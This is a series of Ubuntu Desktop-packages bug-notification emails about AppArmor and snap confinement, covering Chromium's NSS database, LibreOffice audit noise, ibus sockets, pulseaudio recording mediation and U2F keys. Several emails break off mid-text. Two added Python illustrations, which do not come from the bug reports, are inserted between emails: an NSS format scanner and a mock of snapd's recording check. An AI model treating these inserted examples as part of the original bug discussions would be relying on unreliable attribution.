  Feb 21 00:20:55 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265
  Feb 21 00:20:58 millbarge bash[4126190]: Fri, 21 Feb 2020 00:20:58 + src 46 (fix: 3) currently receiving: 0,1@0 0,13@0 0,15@0 0,17@0 0,19@0 0,24@0 0,30@0 1,133@0 1,138@0 2,1@1 2,9@1 2,18@1 2,21@1 2,26@1 3,23@0 3,27@0 3,28@0
  Feb 21 00:21:05 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000
  Feb 21 00:21:05 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access"
  Feb 21 00:21:05 millbarge audit: CWD cwd="/home/sarnold"
  Feb 21 00:21:05 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
  Feb 21 00:21:05 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0
  Feb 21 00:21:05 millbarge audit: PROCTITLE proctitle=2F736E61702F6368726F6D69756D2F313032362F7573722F6C69622F6368726F6D69756D2D62726F777365722F6368726F6D65202D2D6E6F2D64656661756C742D62726F777365722D636865636B202D2D6E6F2D66697273742D72756E202D2D70617373776F72642D73746F7265
  Feb 21 00:21:15 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F5379
[Desktop-packages] [Bug 1859643] Re: [snap] cannot use shared NSS db
OTOH, I think it makes sense to allow for the ability to share ~/.pki/nssdb (and yes, a personal-files addition along with a snap change; perhaps just a symlink from $SNAP_USER_DATA/.pki/nssdb to ~/.pki/nssdb would be enough rather than patching?).

For read access, I have no problem with using personal-files to read the nssdb into $SNAP_USER_DATA, with auto-connection. For write, chromium is not the clear owner of this directory, so I would be hesitant to recommend it as a default since IMO, chromium shouldn't be writing out to these files even in non-snap situations (again, perfectly reasonable to merge in changes if the user desires). I for one would be rather surprised to install a certificate via chromium and have it reflected in my session-wide nssdb for another application (eg, libvirt).

Furthermore, there is nothing saying that nssdb might not change format incompatibly with nss in the chromium snap and software installed on the system. This is not theoretical: rather than using a single nssdb in the user's global ~/.pki/nssdb dir, firefox, for example, instead stores per-profile certN.db files in ~/.mozilla/firefox//* and in my profile dirs I have a mixture of cert8.db and cert9.db. I do see that chromium only has cert9.db, so perhaps this is handled by the library itself (again, someone would need to verify), but then there is nssdb skew if some applications are writing to certN-1.db, some to certN.db and others to certN+1.db.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1859643

Title:
  [snap] cannot use shared NSS db

Status in chromium-browser package in Ubuntu:
  Triaged

Bug description:
  (initially reported at https://askubuntu.com/questions/1202861/chromium-does-not-show-certificates-from-pki-nssdb)

  Chromium can theoretically use the shared NSS db at ~/.pki/nssdb, but the snap confinement prevents it from actually using the shared db (it reads and writes to $SNAP/.pki/nssdb instead). Shared certificates can be inspected by browsing to chrome://settings/certificates.

  Really accessing the shared db would require an additional read/write personal-files plug on $HOME/.pki/nssdb, and patching GetDefaultConfigDirectory() in crypto/nss_util.cc.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1859643/+subscriptions

--
Mailing list: https://launchpad.net/~desktop-packages
Post to     : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help   : https://help.launchpad.net/ListHelp
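The cert8.db / cert9.db "skew" raised in the comment above can be measured rather than guessed at. The following is an added example, not code from the bug report, from chromium or from NSS: it walks a home directory, classifies every NSS store file by its on-disk content (assumption: cert9.db/key4.db are SQLite, cert8.db/key3.db are Berkeley DB 1.85 hash files, identified by their magic numbers) and reports both name/content mismatches and whether the stores on the system use more than one format. The sample tree it builds is constructed test data with only file headers, not a real profile.

```python
import os
import struct
import tempfile

# Assumption (not from the bug report): cert9.db/key4.db are the SQLite
# ("sql:") backend, cert8.db/key3.db the legacy Berkeley DB 1.85 ("dbm:") one.
_BY_NAME = {"cert8.db": "dbm", "key3.db": "dbm", "cert9.db": "sql", "key4.db": "sql"}
_SQLITE_MAGIC = b"SQLite format 3\x00"   # first 16 bytes of every SQLite 3 file
_HASH_MAGIC = 0x061561                   # Berkeley DB 1.85 HASHMAGIC, native byte order


def nss_format(path):
    """Classify an NSS store file by content rather than by name."""
    with open(path, "rb") as f:
        head = f.read(16)
    if head.startswith(_SQLITE_MAGIC):
        return "sql"
    if len(head) >= 4 and _HASH_MAGIC in (struct.unpack("<I", head[:4])[0],
                                          struct.unpack(">I", head[:4])[0]):
        return "dbm"
    return "unknown"


def scan_nss_dbs(root):
    """{store_dir (relative to root): {file: (format_by_name, format_by_content)}}."""
    stores = {}
    for dirpath, _dirs, files in os.walk(root):
        hits = {n: (_BY_NAME[n], nss_format(os.path.join(dirpath, n)))
                for n in files if n in _BY_NAME}
        if hits:
            stores[os.path.relpath(dirpath, root)] = hits
    return stores


def find_skew(stores):
    """(stores whose file name and content disagree, True if the stores on this
    system use more than one format between them, i.e. the certN-1/certN/certN+1
    situation the comment above describes)."""
    mismatched = sorted(d for d, files in stores.items()
                        for _name, (by_name, by_content) in files.items()
                        if by_name != by_content)
    formats = {by_content for files in stores.values()
               for (_by_name, by_content) in files.values()}
    return mismatched, len(formats) > 1


def build_sample_tree():
    """Constructed home directory: a shared ~/.pki/nssdb, two firefox profiles
    with different formats, and a snap-private chromium store whose key4.db
    has dbm content under a sql name (as a mis-migrated store would)."""
    root = tempfile.mkdtemp(prefix="nss-skew-")
    sql = _SQLITE_MAGIC + b"\x00" * 84
    dbm = struct.pack("<I", _HASH_MAGIC) + b"\x00" * 60
    layout = {
        ".pki/nssdb/cert9.db": sql,
        ".mozilla/firefox/abcd1234.default/cert8.db": dbm,
        ".mozilla/firefox/wxyz5678.new/cert9.db": sql,
        "snap/chromium/current/.pki/nssdb/cert9.db": sql,
        "snap/chromium/current/.pki/nssdb/key4.db": dbm,
    }
    for rel, data in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    stores = scan_nss_dbs(build_sample_tree())
    for store, files in sorted(stores.items()):
        print(store, files)
    mismatched, mixed = find_skew(stores)
    print("name/content mismatches:", mismatched)
    print("more than one format in use:", mixed)
```

Run it against a real home directory with `scan_nss_dbs(os.path.expanduser("~"))`; a non-empty mismatch list or `mixed == True` is exactly the state in which sharing one ~/.pki/nssdb between a snap and host applications is risky.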
[Desktop-packages] [Bug 1849680] Re: audit spam in dmesg (libreoffice)
For the next libreoffice upload, the non-/home read-only accesses all look fine to add to the libreoffice profile.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu.
https://bugs.launchpad.net/bugs/1849680

Title:
  audit spam in dmesg (libreoffice)

Status in libreoffice package in Ubuntu:
  New

Bug description:
  My dmesg is getting flooded by apparmor audit messages, mostly from libreoffice (profiles libreoffice-soffice and libreoffice-oosplash):

  $ dmesg | tail -n 25
  [13682.452555] audit: type=1400 audit(1571920851.001:3672): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [13682.453430] audit: type=1400 audit(1571920851.001:3673): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [13682.453933] audit: type=1400 audit(1571920851.001:3674): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [13682.455491] audit: type=1400 audit(1571920851.005:3675): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=17792 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000
  [13682.604100] audit: type=1400 audit(1571920851.153:3676): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  [13682.604138] audit: type=1400 audit(1571920851.153:3677): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.local/share/gvfs-metadata/smb-share:server=buddha,share=chris-22028640.log" pid=17791 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  [13683.097648] audit: type=1400 audit(1571920851.645:3678): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.mozilla/firefox/vq2zzheq.chris-2019-09/cert8.db" pid=17791 comm="soffice.bin" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000
  [16676.510664] kauditd_printk_skb: 1210 callbacks suppressed
  [16676.510665] audit: type=1400 audit(1571923845.047:4889): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.511473] audit: type=1400 audit(1571923845.047:4890): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.550636] audit: type=1400 audit(1571923845.087:4891): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.551394] audit: type=1400 audit(1571923845.087:4892): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.552145] audit: type=1400 audit(1571923845.087:4893): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.552568] audit: type=1400 audit(1571923845.087:4894): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/libdrm/amdgpu.ids" pid=18543 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [16676.553912] audit: type=1400 audit(1571923845.091:4895): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=18543 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000
  [16694.388901] audit: type=1400 audit(1571923862.923:4896): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/mountinfo" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  [16694.388972] audit: type=1400 audit(1571923862.923:4897): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/cgroup" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
  [16694.388992] audit: type=1400 audit(1571923862.923:4898): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice
[Desktop-packages] [Bug 1849680] Re: audit spam in dmesg (libreoffice)
libreoffice ships this profile, so the bug should be tracked there.

** Package changed: apparmor (Ubuntu) => libreoffice (Ubuntu)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu.
https://bugs.launchpad.net/bugs/1849680

Title:
  audit spam in dmesg (libreoffice)

Status in libreoffice package in Ubuntu:
  New
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: apparmor
       Status: Triaged => In Progress

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title:
  [snap] Permission denied on Private encrypted folder

Status in AppArmor:
  In Progress
Status in snapd:
  In Progress
Status in chromium-browser package in Ubuntu:
  Invalid
Status in snapd package in Ubuntu:
  Triaged

Bug description:
  When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

  Package: chromium-browser
  Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions
[Desktop-packages] [Bug 1482852] Re: apparmor profile usr.bin.firefox missing abstractions/ubuntu-helpers
** Package changed: apparmor (Ubuntu) => firefox (Ubuntu)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu.
https://bugs.launchpad.net/bugs/1482852

Title:
  apparmor profile usr.bin.firefox missing abstractions/ubuntu-helpers

Status in firefox package in Ubuntu:
  New

Bug description:
  When trying to open a link to a torrent, apparmor denies my bittorrent client. The log message I got is:

  audit: type=1400 audit(1439028251.208:1075): apparmor="DENIED" operation="exec" info="profile not found" error=-13 profile="/usr/lib/firefox/firefox{,*[^s][^h]}" name="/usr/bin/transmission-gtk" pid=32092 comm="firefox" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0

  Although ubuntu-helpers is included in abstractions/ubuntu-bittorrent-clients to allow x access to transmission, the firefox profile also needs to include abstractions/ubuntu-helpers.

  It is also strange that when I add the definition of ubuntu-helpers to usr.bin.firefox, aa-enforce fails during bootup with the message "Multiple definitions for hat sanitized_helper in profile (null) exist, bailing out." but when I restart it, it seems to set the profiles OK with no error.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/firefox/+bug/1482852/+subscriptions
[Desktop-packages] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fcitx, ...)
@Gunnar - I am preparing the focal upload now, though there is a parser bug (bug 1856738) which means I cannot use @{HOME} in the rule and instead hardcode /home/*/. This will cover all typical situations (ie, not the atypical /root/.cache/ibus...) except when the user updates /etc/apparmor.d/tunables/home.d/ to add a different directory for home. With snaps (this bug) we don't support alternate locations for /home just yet, so this is not a regression. We plan to fix that parser bug for 20.04.

You may want to hold off on a 1.5.22 upload (or revert the XDG patch) until this is updated, to avoid regressing non-snap ibus-abstraction apparmor users with a non-default home.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to ibus in Ubuntu.
https://bugs.launchpad.net/bugs/1580463

Title:
  Snap blocks access to system input methods (ibus, fcitx, ...)

Status in ibus:
  Fix Released
Status in apparmor package in Ubuntu:
  Fix Released
Status in ibus package in Ubuntu:
  In Progress
Status in im-config package in Ubuntu:
  Fix Released
Status in snapd package in Ubuntu:
  Fix Released
Status in apparmor source package in Xenial:
  Fix Released
Status in im-config source package in Xenial:
  Fix Released
Status in snapd source package in Xenial:
  Fix Released
Status in apparmor source package in Yakkety:
  Fix Released
Status in im-config source package in Yakkety:
  Fix Released
Status in snapd source package in Yakkety:
  Fix Released

Bug description:
  = SRU im-config =

  [Impact]
  ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not, so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'", AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc.

  The upload simply adjusts 21_ibus.rc to start ibus-daemon with "--address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required.

  [Test Case]
  1. start a unity session before updating to the package in -proposed
  2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76
  3. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 2973 jamie8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM
  4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before
  5. logout of unity, then log back in
  6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e
     (notice '/tmp/ibus/' in the path)
  7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 3471 jamie8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM
     ...
     (notice '@/tmp/ibus/' in the path)

  In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources.

  Extended test case to verify input support still works in unconfined and confined applications:
  1. System Settings / Language Support; if prompted, install the complete language support
  2. Install Chinese (simple and traditional)
  3. sudo apt-get install ibus-pinyin ibus-sunpinyin
  4. logout / login
  5. System Settings / Text Entry - add Chinese (Pinyin) (IBus)
  6. select pinyin from the indicator
  7. sudo lsof | grep ibus | grep @ # will use @/tmp/dbus-...
  8. open gnome-calculator and try to type something in (should get a pop-up)
  9. open evince and try to search a pdf (should get a pop-up)
  10. upgrade apparmor and im-config from xenial-proposed
  11. logout and back in
  12. sudo lsof | grep ibus | grep @ # will use @/tmp/ibus/...
  13. open gnome-calculator and try to type something in (should get a pop-up)
  14. open evince and try to search a pdf (should get a pop-up)
  15. verify no new apparmor denials

  [Regression Potential]
  The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus-daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up. This change intentionally requires a change to the unity7 snapd
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Note, there is a spread test in snapd that checks whether the mediation patches are dropped (or added). While it is fine for https://launchpad.net/bugs/1856054 to be fast tracked, this pulseaudio bug should not be marked as Fix Released before the end of year break unless you coordinate with the snapd team first, so as to avoid the spread test failing when no one is around to fix it. Specifically, snapd needs:

https://github.com/snapcore/snapd/pull/7885
https://github.com/snapcore/snapd/pull/7886

To be clear, the snapd deb doesn't need to be involved in any of this; it is just coordinating with upstream so the upstream CI doesn't break over the holidays.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title:
  please enable snap mediation support

Status in pulseaudio package in Ubuntu:
  Fix Released
Status in pulseaudio source package in Xenial:
  Fix Committed
Status in pulseaudio source package in Bionic:
  Fix Committed

Bug description:
  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no', with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected being able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

  The patch to pulseaudio consists of adding a module, enabling it in default.pa and then, when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected.

  Adjusting pulseaudio in this manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

  [Test Case]
  IMPORTANT: if updating pulseaudio while the session is running, you either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy.

  For unconfined applications:
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For confined, non-snap applications:
  $ sudo apt-get install evince
  $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
  $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
  yes

  For classic snaps:
  $ sudo snap install test-snapd-classic-confinement --classic
  $ snap run --shell test-snapd-classic-confinement
  $ cat /proc/self/attr/current # verify we are classic confined
  snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes
  $ exit # out of snap run --shell

  For strict snaps with pulseaudio:
  $ sudo snap install test-snapd-pulseaudio --edge
  $ snap connections test-snapd-pulseaudio
  Interface   Plug                              Slot         Notes
  pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
  $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
  $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
  xcb_connection_has_error() returned true
  yes
  (note, the xcb_connection_has_error() message is due to the x11 interface not being connected, which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)
  $ test-snapd-pulseaudio.record /tmp/out.wa
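The record-side decision the [Impact] section describes (label starts with "snap."? then ask snapd whether the snap is classic, and if not whether pulseaudio or audio-record is connected) is small enough to write out. The block below is an added illustration, not pulseaudio's own module (which uses snapd-glib): it assumes the snapd REST shapes GET /v2/snaps/<name> returning result.confinement and GET /v2/connections?snap=<name> returning result.established[].interface, extracts the snap name from an AppArmor label of the form snap.<snap>.<app> (with an optional trailing mode such as " (complain)", as in the test case), and fails closed on any snapd error. The FAKE_SNAPD table is constructed data standing in for a running snapd, and the playback-only snap in it is hypothetical.

```python
import http.client
import json
import re
import socket

# Label is "snap.<snap>.<app>", possibly followed by a mode such as " (complain)".
_SNAP_LABEL = re.compile(r"^snap\.([^.\s]+)\.")
SNAPD_SOCKET = "/run/snapd.socket"


def snap_from_label(label):
    """Snap name from an AppArmor label, or None when the peer is not a snap."""
    m = _SNAP_LABEL.match(label)
    return m.group(1) if m else None


def snapd_get(path, socket_path=SNAPD_SOCKET):
    """GET a snapd REST path over its unix socket and return the decoded JSON.
    Needs a running snapd; the demo below injects the fake table instead."""
    conn = http.client.HTTPConnection("localhost")
    conn.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    conn.sock.connect(socket_path)
    conn.request("GET", path)
    return json.loads(conn.getresponse().read())


def may_record(label, get=snapd_get):
    """Non-snaps and classic snaps may record; strict snaps only when pulseaudio
    or audio-record is connected. Any snapd error fails closed. (Playback is
    allowed to every client, so it needs no decision at all.)"""
    snap = snap_from_label(label)
    if snap is None:
        return True
    info = get(f"/v2/snaps/{snap}")
    if info.get("status-code") != 200:
        return False
    if info["result"].get("confinement") == "classic":
        return True
    conns = get(f"/v2/connections?snap={snap}")
    if conns.get("status-code") != 200:
        return False
    connected = {c["interface"] for c in conns["result"].get("established", [])}
    return bool(connected & {"pulseaudio", "audio-record"})


# Constructed snapd answers for the snaps named in the test case plus a
# hypothetical playback-only snap; this is sample data, not real snapd output.
FAKE_SNAPD = {
    "/v2/snaps/test-snapd-classic-confinement": {"status-code": 200, "result": {"confinement": "classic"}},
    "/v2/snaps/test-snapd-pulseaudio": {"status-code": 200, "result": {"confinement": "strict"}},
    "/v2/connections?snap=test-snapd-pulseaudio": {"status-code": 200, "result": {"established": [
        {"interface": "pulseaudio",
         "plug": {"snap": "test-snapd-pulseaudio", "plug": "pulseaudio"},
         "slot": {"snap": "core", "slot": "pulseaudio"}}]}},
    "/v2/snaps/playback-only": {"status-code": 200, "result": {"confinement": "strict"}},
    "/v2/connections?snap=playback-only": {"status-code": 200, "result": {"established": [
        {"interface": "audio-playback",
         "plug": {"snap": "playback-only", "plug": "audio-playback"},
         "slot": {"snap": "core", "slot": "audio-playback"}}]}},
}


def fake_get(path):
    return FAKE_SNAPD.get(path, {"status-code": 404, "status": "Not Found"})


if __name__ == "__main__":
    for label in ("unconfined", "/usr/bin/evince",
                  "snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)",
                  "snap.test-snapd-pulseaudio.record", "snap.playback-only.play",
                  "snap.unknown.app"):
        verdict = "allow" if may_record(label, fake_get) else "deny"
        print(f"{label:80s} record={verdict}")
```

The two snapd round trips happen per record request, and an unknown snap or a snapd outage denies recording rather than silently allowing it; that is the same fail-closed bias the [Impact] text argues for when it prefers mediation over the 18.04 behaviour of recording being open to every connected client.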
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
** Changed in: snapd
       Status: In Progress => Fix Released

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1851211

Title:
  [snap] SoloKeys not supported by u2f-devices interface

Status in snapd:
  Fix Released
Status in chromium-browser package in Ubuntu:
  Confirmed
Status in snapd package in Ubuntu:
  Triaged

Bug description:
  This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164 it is still open. No chance to use such a key in the browser.

  My dmesg output shows a lot of DENIED:

  audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
  [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0

  Suggested solutions in the other tickets do not work.

  System is Ubuntu 19.10 on an Asus UX330
  ---
  ProblemType: Bug
  ApportVersion: 2.20.11-0ubuntu8.2
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  DRM.card0-HDMI-A-1:
   enabled: enabled
   dpms: On
   status: connected
   edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg==
